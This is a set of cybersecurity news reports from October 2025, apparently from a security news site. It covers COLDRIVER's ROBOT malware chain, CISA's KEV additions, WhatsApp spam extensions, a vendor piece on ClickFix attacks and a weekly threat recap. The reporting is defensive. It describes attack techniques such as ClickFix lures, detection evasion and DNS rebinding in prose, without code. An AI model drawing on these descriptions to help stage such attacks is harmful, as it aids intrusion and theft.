Category: Cybersecurity

Oct 21, 2025Ravie LakshmananCyber Espionage / Threat Intelligence

A new malware attributed to the Russia-linked hacking group known as COLDRIVER has undergone numerous developmental iterations since May 2025, suggesting an increased “operations tempo” from the threat actor.

The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following the publication of its LOSTKEYS malware around the same time.

While it’s currently not known for how long the new malware families have been under development, the tech giant’s threat intelligence team said it has not observed a single instance of LOSTKEYS since disclosure.

The new malware, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, is “a collection of related malware families connected via a delivery chain,” GTIG researcher Wesley Shields said in a Monday analysis.

The latest attack waves are something of a departure from COLDRIVER’s typical modus operandi, which involves targeting high profile individuals in NGOs, policy advisors, and dissidents for credential theft. In contrast, the new activity revolved around leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt.

While the attacks spotted in January, March, and April 2025 led to the deployment of an information stealing malware known as LOSTKEYS, subsequent intrusions have paved the way for the “ROBOT” family of malware. It’s worth noting that the malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.

The new infection chain commences with an HTML ClickFix lure dubbed COLDCOPY that’s designed to drop a DLL called NOROBOT, which is then executed via rundll32.exe to drop the next-stage malware. Initial versions of this attack is said to have distributed a Python backdoor known as YESROBOT, before the threat actors switch to a Powershell implant named MAYBEROBOT.

YESROBOT uses HTTPS to retrieve commands from a hard-coded command-and-control (C2) server. A minimal backdoor, it supports the ability to download and execute files, and retrieve documents of interest. Only two instances of YESROBOT deployment have been observed to date, specifically over a two week period in late May shortly after details of LOSTKEYS became public knowledge.

In contrast, MAYBEROBOT is assessed to be more flexible and extensible, equipped with features to download and run payload from a specified URL, run commands using cmd.exe, and run PowerShell code.

It’s believed that the COLDRIVER actors rushed to deploy YESROBOT as a “stopgap mechanism” likely in response to public disclosure, before abandoning it in favor of MAYBEROBOT, as the earliest version of NOROBOT also included a step to download a full Python 3.8 installation onto the compromised host — a “noisy” artifact that’s bound to raise suspicion.

Google also pointed out that the use of NOROBOT and MAYBEROBOT is likely reserved for significant targets, who may have been already compromised via phishing, with the end goal of gathering additional intelligence from their devices.

“NOROBOT and its preceding infection chain have been subject to constant evolution — initially simplified to increase chances of successful deployment, before re-introducing complexity by splitting cryptography keys,” Shields said. “This constant development highlights the group’s efforts to evade detection systems for their delivery mechanism for continued intelligence collection against high-value targets.”

The disclosure comes as the Netherlands’ Public Prosecution Service, known as the Openbaar Ministerie (OM), announced that three 17-year-old men have been suspected of providing services to a foreign government, with one of them alleged to be in contact with a hacker group affiliated with the Russian government.

“This suspect also gave the other two instructions to map Wi-Fi networks on multiple dates in The Hague,” OM said. “The information collected has been shared with the client by the former suspect for a fee and can be used for digital espionage and cyber attacks.”

Two of the suspects were apprehended on September 22, 2025, while the third suspect, who was also interviewed by authorities, has been kept under house arrest because of his “limited role” in the case.

“There are no indications yet that pressure has been exerted on the suspect who was in contact with the hacker group affiliated with the Russian government,” the Dutch government body added.

Oct 20, 2025Ravie LakshmananThreat Intelligence / Data Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added five security flaws to its Known Exploited Vulnerabilities (KEV) Catalog, officially confirming a recently disclosed vulnerability impacting Oracle E-Business Suite (EBS) has been weaponized in real-world attacks.

The security defect in question is CVE-2025-61884 (CVSS score: 7.5), which has been described as a server-side request forgery (SSRF) vulnerability in the Runtime component of Oracle Configurator that could allow attackers unauthorized access to critical data.

“This vulnerability is remotely exploitable without authentication,” CISA said.

CVE-2025-61884 is the second flaw in Oracle EBS to be actively exploited along with CVE-2025-61882 (CVSS score: 9.8), a critical bug that could permit unauthenticated attackers to execute arbitrary code on susceptible instances.

Earlier this month, Google Threat Intelligence Group (GTIG) and Mandiant revealed dozens of organizations may have been impacted following the exploitation of CVE-2025-61882.

“At this time, we are not able to attribute any specific exploitation activity to a specific actor, but it’s likely that at least some of the exploitation activity we observed was conducted by actors now conducting Cl0p-branded extortion operations,” Zander Work, senior security engineer at GTIG, told The Hacker News last week.

Also added by CISA to the KEV catalog are four other vulnerabilities –

• CVE-2025-33073 (CVSS score: 8.8) – An improper access control vulnerability in Microsoft Windows SMB Client that could allow for privilege escalation (Fixed by Microsoft in June 2025)
• CVE-2025-2746 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling of empty SHA1 usernames in digest authentication (Fixed in Kentico in March 2025)
• CVE-2025-2747 (CVSS score: 9.8) – An authentication bypass using an alternate path or channel vulnerability in Kentico Xperience CMS that could allow an attacker to control administrative objects by taking advantage of the Staging Sync Server password handling for the server defined None type (Fixed in Kentico in March 2025)
• CVE-2022-48503 (CVSS score: 8.8) – An improper validation of array index vulnerability in Apple’s JavaScriptCore component that could result in arbitrary code execution when processing web content (Fixed by Apple in July 2022)

There are currently no details on how the aforementioned four issues are being exploited in the wild, although details about CVE-2025-33073, CVE-2025-2746, and CVE-2025-2747 were shared by researchers from Synacktiv and watchTowr Labs, respectively.

Federal Civilian Executive Branch (FCEB) agencies are required to remediate identified vulnerabilities by November 10, 2025, to secure their networks against active threats.

Oct 20, 2025Ravie LakshmananBrowser Security / Malware

Cybersecurity researchers have uncovered a coordinated campaign that leveraged 131 rebranded clones of a WhatsApp Web automation extension for Google Chrome to spam Brazilian users at scale.

The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.

“They are not classic malware, but they function as high-risk spam automation that abuses platform rules,” security researcher Kirill Boychenko said. “The code injects directly into the WhatsApp Web page, running alongside WhatsApp’s own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp’s anti-spam enforcement.”

The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform’s rate limits and anti-spam controls.

The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below –

• YouSeller (10,000 users)
• performancemais (239 users)
• Botflow (38 users)
• ZapVende (32 users)

The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by “WL Extensão” and its variant “WLExtensao.” It’s believed that the differences in branding are the result of a franchise model that allows the operation’s affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.

These add-ons also claim to masquerade as customer relationship management (CRM) tools for WhatsApp, allowing users to maximize their sales through the web version of the application.

“Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you’ll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more,” reads the description of ZapVende on the Chrome Web Store. “Organize your customer service, track leads, and schedule messages in a practical and efficient way.”

DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.

It’s worth noting that the practice is in violation of Google’s Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp’s anti-spam algorithms when using the extensions.

“The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation,” Boychenko noted. “The goal is to keep bulk campaigns running while evading anti-spam systems.”

The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that’s targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that’s used to distribute a banking trojan codenamed Maverick.

ClickFix, FileFix, fake CAPTCHA — whatever you call it, attacks where users interact with malicious scripts in their web browser are a fast-growing source of security breaches.

ClickFix attacks prompt the user to solve some kind of problem or challenge in the browser — most commonly a CAPTCHA, but also things like fixing an error on a webpage.

The name is a little misleading, though — the key factor in the attack is that they trick users into running malicious commands on their device by copying malicious code from the page clipboard and running it locally.

Examples of ClickFix lures used by attackers in the wild.

ClickFix is known to be regularly used by the Interlock ransomware group and other prolific threat actors, including state-sponsored APTs. A number of recent public data breaches have been linked to ClickFix-style TTPs, such as Kettering Health, DaVita, City of St. Paul, Minnesota, and the Texas Tech University Health Sciences Centers (with many more breaches likely to involve ClickFix where the attack vector wasn’t known or disclosed).

But why are these attacks proving to be so effective?

Reason 1: Users aren’t ready for ClickFix

For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command.

Suspicion is further reduced when you consider that the malicious clipboard copy action is performed behind the scenes via JavaScript 99% of the time.

Example of unobfuscated JavaScript code performing the copy function automatically on a ClickFix page without user input.

And with modern ClickFix sites and lures becoming increasingly legitimate-looking (see the example below), it’s not surprising that users are falling victim.

One of the more legit-looking ClickFix lures — this one even has an embedded video showing the user what to do!

When you consider the fact that these attacks are moving away from email altogether, it doesn’t fit the model of what users are trained to be suspicious of.

The top delivery vector identified by Push Security researchers was found to be SEO poisoning & malvertising via Google Search. By creating new domains or taking over legitimate ones, attackers are creating watering hole scenarios to intercept users browsing the internet.

And even if you were suspicious, there’s no convenient “report phishing” button or workflow to notify your security team for Google Search results, social media messages, website ads, and so on.

Reason 2: ClickFix isn’t being detected during delivery

There are a few aspects of why ClickFix attacks are going undetected by technical controls.

ClickFix pages, like other modern phishing sites, are using a range of detection evasion techniques that prevent them from being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e., blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures from firing.

And by using non-email delivery vectors, an entire layer of detection opportunity is cut out.

Like other modern phishing attacks, ClickFix lures are distributed all over the internet — not just email.

Malvertising adds another layer of targeting to the picture. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target is located, you can tailor the ad parameters accordingly.

Along with other techniques, like conditional loading to return a lure appropriate for your operating system (or not triggering at all unless certain conditions are met, e.g. you’re visiting from a mobile OS, or from outside a target IP range) attackers have a way of reaching a large number of potential victims while avoiding security controls at the email layer and preventing unwanted analysis.

Example of a ClickFix lure built onto a vibe-coded site.

Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.

Reason 3: EDR is the last and only line of defense — and it’s not foolproof

There are multiple stages to the attack that can and should be intercepted by EDR, but the level of detection raised, and whether an action is blocked in real time, is driven by context.

Because there’s no file download from the web, and the act of running code on the machine is initiated by the user, there’s no context tying the action to another application to make it appear suspicious. For example, malicious PowerShell executed from Outlook or Chrome would appear obviously suspicious, but because it’s user-initiated, it’s isolated from the context of where the code was delivered.

The malicious commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately.

The final stage at which the attack should be intercepted by any reputable EDR is at the point of malware execution. But detection evasion is a cat-and-mouse game, and attackers are always looking for ways to tweak their malware to evade or disable detection tools. So, exceptions do happen.

And if you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.

Ultimately, organizations are leaving themselves relying on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all.

Why the standard recommendations are falling short

Most of the vendor-agnostic recommendations have focused on restricting access to services like the Windows Run dialog box for typical users. But although mshta and PowerShell remain the most commonly observed, security researchers have already spotted a wide range of LOLBINS targeting different services, many of which are difficult to prevent users from accessing.

It’s also worth considering how ClickFix-style attacks may continue to evolve in the future. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? For example, by pasting malicious JavaScript directly into the devtools on a relevant webpage.

The current hybrid attack path sees the attacker deliver lures in the browser, to compromise the endpoint, to get access to creds and cookies stored in the browser. What if you could skip the endpoint altogether?

Stopping ClickFix on the front line — in the browser

Push Security’s latest feature, malicious copy and paste detection, tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.

Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.

Check out the video below for more information.

Learn more

If you want to learn more about ClickFix attacks and how they’re evolving, check out this upcoming webinar where Push Security researchers will be diving into real-world ClickFix examples and demonstrating how ClickFix sites work under the hood.

Push Security’s browser-based security platform provides comprehensive attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more, to harden your identity attack surface.

To learn more about Push, check out our latest product overview or book some time with one of our team for a live demo.

It’s easy to think your defenses are solid — until you realize attackers have been inside them the whole time. The latest incidents show that long-term, silent breaches are becoming the norm. The best defense now isn’t just patching fast, but watching smarter and staying alert for what you don’t expect.

Here’s a quick look at this week’s top threats, new tactics, and security stories shaping the landscape.

⚡ Threat of the Week

F5 Exposed to Nation-State Breach — F5 disclosed that unidentified threat actors broke into its systems and stole files containing some of BIG-IP’s source code and information related to undisclosed vulnerabilities in the product. The company said it learned of the incident on August 9, 2025, although it’s believed that the attackers were in its network for at least 12 months. The attackers are said to have used a malware family called BRICKSTORM, which is attributed to a China-nexus espionage group dubbed UNC5221. GreyNoise said it observed elevated scanning activity targeting BIG-IP in three waves on September 23, October 14, and October 15, 2025, but emphasized the anomalies may not necessarily relate to the hack. Censys said it identified over 680,000 F5 BIG-IP load balancers and application gateways visible on the public internet, with the majority of hosts located in the U.S., followed by Germany, France, Japan, and China. Not all identified systems are necessarily vulnerable, but each represents a publicly accessible interface that should be inventoried, access-restricted, and patched proactively as a precautionary measure. “Edge infrastructure and security vendors remain prime targets for long-term, often state-linked threat actors,” John Fokker, vice president of threat intelligence strategy at Trellix, said. “Over the years, we have seen nation-state interest in exploiting vulnerabilities in edge devices, recognizing their strategic position in global networks. Incidents like these remind us that strengthening collective resilience requires not only hardened technology but also open collaboration and intelligence sharing across the security community.”

• N. Korea Uses EtherHiding to Hide Malware Inside Blockchain Smart Contracts — North Korean threat actors have been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed to a cluster tracked as UNC5342 (aka Famous Chollima). The attack wave is part of a long-running campaign codenamed Contagious Interview, wherein the attackers approach potential targets on LinkedIn by posing as recruiters or hiring managers, and trick them into running malicious code under the pretext of a job assessment after shifting the conversation to Telegram or Discord. In the latest attack waves observed since February 2025, the threat actors use a JavaScript downloader that interacts with a malicious BSC smart contract to download JADESNOW, which subsequently queries the transaction history associated with an Ethereum address to fetch the JavaScript version of InvisibleFerret.
• LinkPro Linux Rootkit Spotted in the Wild — An investigation into the compromise of an Amazon Web Services (AWS)-hosted infrastructure led to the discovery of a new GNU/Linux rootkit dubbed LinkPro. The backdoor features functionalities relying on the installation of two extended Berkeley Packet Filter (eBPF) modules to conceal itself and to be remotely activated upon receiving a magic packet – a TCP SYN packet with a specific window size (54321) that signals the rootkit to await further instructions within a one-hour window, allowing it to evade traditional security defenses. The commands supported by LinkPro include executing /bin/bash in a pseudo-terminal, running a shell command, enumerating files and directories, performing file operations, downloading files, and setting up a SOCKS5 proxy tunnel. It’s currently not known who is behind the attack, but it’s suspected that the threat actors are financially motivated.
• Zero Disco Campaign Targets Cisco Devices with Rootkits — A new campaign has exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow an authenticated, remote attacker to execute arbitrary code by sending crafted SNMP packets to a susceptible device. The operation primarily impacted Cisco 9400, 9300, and legacy 3750G series devices, Trend Micro said. The intrusions have not been attributed to any known threat actor or group.
• Pixnapping Attack Leads to Data Theft on Android Devices — Android devices from Google and Samsung have been found vulnerable to a side-channel attack that could be exploited to covertly steal two-factor authentication (2FA) codes, Google Maps timelines, and other sensitive data without the users’ knowledge pixel-by-pixel. The attack has been codenamed Pixnapping. Google is tracking the issue under the CVE identifier CVE-2025-48561 (CVSS score: 5.5). Patches for the vulnerability were issued by the tech giant as part of its September 2025 Android Security Bulletin, with additional fixes forthcoming in December.
• Chinese Threat Actors Exploited ArcGIS Server as Backdoor — Threat actors with ties to China have been attributed to a novel campaign that compromised an ArcGIS system and turned it into a backdoor for more than a year. The activity is the handiwork of a Chinese state-sponsored hacking group called Flax Typhoon, which is also tracked as Ethereal Panda and RedJuliett. “The group cleverly modified a geo-mapping application’s Java server object extension (SOE) into a functioning web shell,” ReliaQuest said. “By gating access with a hardcoded key for exclusive control and embedding it in system backups, they achieved deep, long-term persistence that could survive a full system recovery.” The attack chain involved the threat actors targeting a public-facing ArcGIS server that was linked to a private, internal ArcGIS server by compromising a portal administrator account to deploy a malicious SOE, thereby allowing them to blend in with normal traffic and maintain access for extended periods. The attackers then instructed the public-facing server to create a hidden directory to serve as the group’s “private workspace.” They also blocked access to other attackers and admins with a hard-coded key. The findings demonstrate Flax Typhoon’s consistent modus operandi of quietly turning an organization’s own tools against itself rather than using sophisticated malware or exploits.

‎️‍🔥 Trending CVEs

Hackers move fast. They often exploit new vulnerabilities within hours, turning a single missed patch into a major breach. One unpatched CVE can be all it takes for a full compromise. Below are this week’s most critical vulnerabilities gaining attention across the industry. Review them, prioritize your fixes, and close the gap before attackers take advantage.

This week’s list includes — CVE-2025-24990, CVE-2025-59230 (Microsoft Windows), CVE-2025-47827 (IGEL OS before 11), CVE-2023-42770, CVE-2023-40151 (Red Lion Sixnet RTUs), CVE-2025-2611 (ICTBroadcast), CVE-2025-55315 (Microsoft ASP.NET Core), CVE-2025-11577 (Clevo UEFI firmware), CVE-2025-37729 (Elastic Cloud Enterprise), CVE-2025-9713, CVE-2025-11622 (Ivanti Endpoint Manager), CVE-2025-48983, CVE-2025-48984 (Veeam), CVE-2025-11756 (Google Chrome), CVE-2025-49201 (Fortinet FortiPAM and FortiSwitch Manager), CVE-2025-58325 (Fortinet FortiOS CLI), CVE-2025-49553 (Adobe Connect collaboration suite), CVE-2025-9217 (Slider Revolution plugin), CVE-2025-10230 (Samba), CVE-2025-54539 (Apache ActiveMQ), CVE-2025-41703, CVE-2025-41704, CVE-2025-41706, CVE-2025-41707 (Phoenix Contact QUINT4), and CVE-2025-11492, CVE-2025-11493 (ConnectWise Automate).

📰 Around the Cyber World

• Microsoft Unveils New Security Improvements — Microsoft revealed that “parts of the kernel in Windows 11 have been rewritten in Rust, which helps mitigate against memory corruption vulnerabilities like buffer overflows and helps reduce attack surfaces.” The company also noted that it’s taking steps to secure AI-powered agentic experiences on the operating system by ensuring that they operate with limited permissions and only obtain access to resources users’ explicitly provide permission to. In addition, Microsoft said agents that integrate with Windows must be cryptographically signed by a trusted source so that they can be revoked if found to be malicious. Each AI agent will also run under its own dedicated agent account that’s distinct from the user account on the device. “This facilitates agent-specific policy application that can be different from the rules applied to other accounts like those for human users,” it said.
• SEO Campaign Uses Fake Ivanti Installers to Steal Credentials — A new attack campaign has leveraged SEO poisoning to lure users into downloading a malicious version of the Ivanti Pulse Secure VPN client. The activity targets users searching for legitimate software on search engines like Bing, redirecting them to attacker-controlled lookalike websites (ivanti-pulsesecure[.]com or ivanti-secure-access[.]org). The goal of this attack is to steal VPN credentials from the victim’s machine, enabling further compromise. “The malicious installer, a signed MSI file, contains a credential-stealing DLL designed to locate, parse, and exfiltrate VPN connection details,” Zscaler said. “The malware specifically targets the connectionstore.dat file to steal saved VPN server URIs, which it combines with hardcoded credentials for exfiltration. Data is sent to a command-and-control (C2) server hosted on Microsoft Azure infrastructure.”
• Qilin’s Ties with BPH Providers Exposed — Cybersecurity researchers from Resecurity examined Qilin ransomware group’s “close affiliation” with underground bulletproof hosting (BPH) operators, finding that the e-crime actor has not only relied on Cat Technologies Co. Limited. (which, in turn, is hosted on an IP address tied to Aeza Group) for hosting its data leak site, but also advertised services like BEARHOST Servers (aka Underground) on its WikiLeaksV2 site, where the group publishes content about their activities. BEARHOST has been operational since 2016, offering its services for anywhere from $95 to $500. While BEARHOST abruptly announced the stoppage of its service on December 28, 2024, it is assessed that the threat actors have taken the BPH service into private mode, catering only to trusted and vetted underground actors. On May 8, 2025, it resurfaced as Voodoo Servers, only for the operators to terminate the service again towards the end of the month, citing political reasons. “The actors decided to disappear through an ‘exit scam’ scenario, keeping the underground audience completely clueless,” Resecurity said. “Notably, the legal entities behind the service continue their operations.” Notably, Cat Technologies Co. Limited. also shares links to shadowy entities like Red Bytes LLC, Hostway, Starcrecium Limited, and Chang Way Technologies Co. Limited, the last of which has been associated with extensive malware activity, hosting command-and-control (C2) servers of Amadey, StealC, and Cobalt Strike used by cybercriminals. Another entity of note is Next Limited, which shares the same Hong Kong address as Chang Way Technologies Co. Limited and has been attributed to malicious activity in connection with Proton66.
• U.S. Judge Bars NSO Group from Targeting WhatsApp — A U.S. judge barred NSO Group from targeting WhatsApp users and cut the punitive damages verdict awarded to Meta by a jury in May 2025 to $4 million, because the court did not have enough evidence to determine that NSO Group’s behavior was “particularly egregious.” The permanent injunction handed out by U.S. District Judge Phyllis Hamilton means that the Israeli vendor cannot use WhatsApp as a way to infect targets’ devices. As a refresher, Meta sued the NSO Group in 2019 over the use of Pegasus spyware by exploiting a then-zero-day flaw in the messaging app to spy on 1,400 people from 20 countries, including journalists and human rights activists. It was fined close to $168 million earlier this May. The proposed injunction requires NSO Group to delete and destroy computer code related to Meta’s platforms, and she concluded that the provision is “necessary to prevent future violations, especially given the undetectable nature of defendants’ technology.”
• Google’s Privacy Sandbox Initiative is Officially Dead — In 2019, Google launched an initiative called Privacy Sandbox to come up with privacy-enhancing alternatives to replace third-party cookies on the web. However, with the company abandoning its plans to deprecate third-party tracking cookies, the project appears to be winding down. To that end, the tech giant said it’s retiring the following Privacy Sandbox technologies citing low levels of adoption: Attribution Reporting API (Chrome and Android), IP Protection, On-Device Personalization, Private Aggregation (including Shared Storage), Protected Audience (Chrome and Android), Protected App Signals, Related Website Sets (including requestStorageAccessFor and Related Website Partition), SelectURL, SDK Runtime and Topics (Chrome and Android). In a statement shared with Adweek, the company said it will continue to work to improve privacy across Chrome, Android, and the web, but not under the Privacy Sandbox branding.
• Russia Blocks Foreign SIM Cards — Russia said it’s taking steps to temporarily block mobile internet for foreign SIM cards, citing national security reasons. The new rule imposes a mandatory 24-hour mobile internet blackout for anyone entering Russia with a foreign SIM card.
• Flaw in CORS headers in Web Browsers Disclosed — The CERT Coordination Center (CERT/CC) disclosed details of a vulnerability in cross-origin resource sharing (CORS) headers in Chromium, Google Chrome, Microsoft Edge, Safari, and Firefox that enables the CORS policy to be manipulated. This can be combined with DNS rebinding techniques to issue arbitrary requests to services listening on arbitrary ports, regardless of the CORS policy in place by the target. “An attacker can use a malicious site to execute a JavaScript payload that periodically sends CORS headers in order to ask the server if the cross-origin request is safe and allowed,” CERT/CC explained. “Naturally, the attacker-controlled hostname will respond with permissive CORS headers that will circumvent the CORS policy. The attacker then performs a DNS rebinding attack so that the hostname is assigned the IP address of the target service. After the DNS responds with the changed IP address, the new target inherits the relaxed CORS policy, allowing an attacker to potentially exfiltrate data from the target.” Mozilla is tracking the vulnerability as CVE-2025-8036.
• Phishing Campaigns Use Microsoft’s Logo for Tech Support Scams — Threat actors are exploiting Microsoft’s Name and branding in phishing emails to lure users into fraudulent tech support scams. The messages contain links that, when clicked, take the victims to a fake CAPTCHA challenge, after which they are redirected to a phishing landing page to unleash the next stage of the attack. “After passing the captcha verification, the victim is suddenly visually overloaded with several pop-ups that appear to be Microsoft security alerts,” Cofense said. “Their browser is manipulated to appear locked, and they lose the ability to locate or control their mouse, which adds to the feeling that the system is compromised. This involuntary loss of control creates a faux ransomware experience, leading the user to believe their computer is locked and to take immediate action to remedy the infection.” From there, users are instructed to call a number to reach Windows Support, at which they are connected to a bogus technician to take the attack forward. “The threat actor could exploit further by asking the user to provide account credentials or persuade the user to install remote desktop tools, allowing full access to their system,” the company said.
• Taxpayers, Drivers Targeted in Refund and Road Toll Smishing Scams — A smishing campaign has leveraged at least 850 newly-registered domain names in September and early October to target people living in the U.S., the U.K., and elsewhere with phishing links that use tax refunds, road toll charges, or failed package deliveries as a lure. The websites, designed to be loaded only when launched from a mobile device, claim to provide information about their tax refund status or obtain a subsidy of up to £300 to help offset winter fuel costs (note: this is a real U.K. government initiative), only to prompt them to provide personal details such as name, home address, telephone number and email address, as well as payment card information. The entered data is exfiltrated to the attackers over the WebSocket protocol. Some of the scam websites have also been found to target Canadian, German, and Spanish residents and visitors, per Netcraft.
• Meta’s New Collage Feature May Use Photos in Phone’s Camera Roll — Meta is officially rolling out a new opt-in feature to Facebook users in the U.S. and Canada to suggest the best photos and videos from users’ camera roll and create collages and edits. “With your permission and the help of AI, our new feature enables Facebook to automatically surface hidden gems – those memorable moments that get lost among screenshots, receipts, and random snaps – and edit them to save or share,” the company said. The feature was first tested back in late June 2025. The social media company emphasized that the suggestions are private and that it does not use media obtained from users’ devices via the camera roll to train its models, unless users opt to edit the media with their AI tools or publish those suggestions to Facebook. Users who wish to opt out of the feature can do so by navigating Settings and Privacy > Settings > Preferences > Camera Roll Sharing Suggestions.
• Fake Homebrew, TradingView, LogMeIn Sites Serve Stealer Malware Targeting Macs — Threat actors are employing social engineering tactics to trick users into visiting fake websites impersonating trusted platforms like as Homebrew, TradingView, and LogMeIn, where they are instructed to copy and run a malicious command on the Terminal app as part of ClickFix-style attacks, resulting in the deployment of stealer malware such as Atomic Stealer and Odyssey Stealer. “More than 85 phishing domains were identified, connected through shared SSL certificates, payload servers, and reused infrastructure,” Hunt.io said. “The findings suggest a coordinated and ongoing campaign in which operators continuously adapt their infrastructure and tactics to maintain persistence and evade detection within the macOS ecosystem.” It’s suspected that users are driven to these websites via sponsored ads on search engines like Bing and Google.
• Dutch Data Protection Watchdog Fines Experian $3.2 Million for Privacy Violations — The Dutch Data Protection Authority (DPA) imposed a fine of €2.7 million ($3.2 million) on Experian Netherlands for collecting data in contravention of the E.U. General Data Protection Regulation (GDPR). The DPA said the consumer credit reporting company gathered information on people from both public and non-public sources and failed to make it clear why the collection of certain data was necessary. In addition to the penalty, Experian is expected to delete the database of personal data by the end of the year. The company has also ceased its operations in the country. “Until January 1, 2025, Experian provided credit assessments about individuals to its clients,” the DPA said. “To do this, the company collected data such as negative payment behavior, outstanding debts, or bankruptcies. The AP found that Experian violated the law by unlawfully using personal data.”
• Threat Actors Send Fake Password Manager Breach Alerts — Bad actors are sending phishing alerts claiming that their password manager accounts for 1Password and Lastpass have been compromised in order to trick users into providing their passwords and hijack their accounts. In response to the attack, LastPass said it has not been hacked and that it’s an attempt on the part of the attackers to generate a false sense of urgency. In some cases spotted by Bleeping Computer, the activity has also been found to urge recipients to install a more secure version of the password manager, resulting in the deployment of a legitimate remote access software called Syncro. The software vendor has since moved to shut down the malicious accounts to prevent further installs.
• SocGholish MaaS Detailed — LevelBlue has published an analysis of a threat activity cluster known as SocGholish (aka FakeUpdates), which is known to be active since 2017, leveraging fake web browser update prompts on compromised websites as a lure to distribute malware. Victims are typically routed through Traffic Distribution Systems (TDS) like Keitaro and Parrot TDS to filter users based on specific factors such as geography, browser type, or system configuration, ensuring that only the intended targets are exposed to the payload. It’s offered under a malware-as-a-service (MaaS) by a financially motivated cybercrime group called TA569. SocGholish stands out for its ability to turn legitimate websites into large-scale distribution platforms for malware. Acting as an initial access broker (IAB), its operations profit from follow-on compromises by other actors. “Once executed, its payloads range from loaders and stealers to ransomware, allowing for extensive follow-up exploitation,” LevelBlue said. “This combination of broad reach, simple delivery mechanisms, and flexible use by multiple groups makes SocGholish a persistent and dangerous threat across industries and regions.” One of its primary users is Evil Corp, with the malware also used to deliver RansomHub in early 2025.

🎥 Cybersecurity Webinars

• The Practical Framework to Govern AI Agents Without Slowing Innovation → AI is changing everything fast — but for most security teams, it still feels like a fight just to keep up. The goal isn’t to slow innovation with more controls; it’s to make those controls work for the business. By building security into AI from the start, you can turn what used to be a bottleneck into a real accelerator for growth and trust.
• The Future of AI in GRC: Turning Risk Into a Compliance Advantage – AI is changing how companies manage risk and compliance — fast. It brings big opportunities but also new challenges. This webinar shows you how to use AI safely and effectively in GRC, avoid common mistakes, and turn complex rules into a real business advantage.
• Workflow Clarity: How to Blend AI and Human Effort for Real Results – Too many teams are rushing to “add AI” without a plan — and ending up with messy, unreliable workflows. Join us to learn a clearer approach: how to use AI thoughtfully, simplify automation, and build systems that scale securely.

🔧 Cybersecurity Tools

• Beelzebub – It turns honeypot deployment into a powerful, low-code experience. It uses AI to simulate real systems, helping security teams detect attacks, track emerging threats, and share insights through a global threat intelligence network.
• NetworkHound – It maps your Active Directory network from the inside out. It discovers every device — domain-joined or shadow-IT — validates SMB and web services, and builds a full BloodHound-compatible graph so you can see and secure your environment clearly.

Disclaimer: These tools are for educational and research use only. They haven’t been fully security-tested and could pose risks if used incorrectly. Review the code before trying them, test only in safe environments, and follow all ethical, legal, and organizational rules.

🔒 Tip of the Week

